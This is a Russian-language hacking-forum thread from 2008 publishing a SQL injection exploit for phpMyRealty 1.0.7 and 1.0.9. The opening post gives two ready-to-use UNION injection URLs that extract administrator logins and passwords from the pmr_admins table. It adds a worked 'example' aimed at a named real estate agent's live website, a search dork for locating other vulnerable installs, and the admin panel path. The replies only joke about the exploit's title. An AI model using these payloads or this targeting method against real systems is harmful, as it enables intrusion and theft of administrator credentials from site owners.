phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability

Discussion in 'Веб-уязвимости' started by ~!DoK_tOR!~, 28 Aug 2008.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: phpMyRealty
    Version: 1.0.7, 1.0.9
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[COLOR=DarkOrange][installdir][/COLOR]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*
    Exploit 2:

    Code:
    http://localhost/[COLOR=DarkOrange][installdir][/COLOR]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/*
    Example:

    Code:
    http://www.rightchoicehomes.co.uk/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*
    Admin panel:

    http://localhost/[installdir]/admin/

    Dork:

    Powered by phpMyRealty 1.0.7
    Powered by phpMyRealty.com

    http://milw0rm.com/exploits/6320
    (c) ~!Dok_tOR!~
     
    3 people like this.
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    А бывает еще Local SQL Injection Vulnerability ?
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    976
    Reputations:
    783
    Ага, из под админа:d А вообще такие названия - это мода с милворма
     
  4. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    что вы прикопались к названию ? можно было просто назвать без Remote )
     
Loading...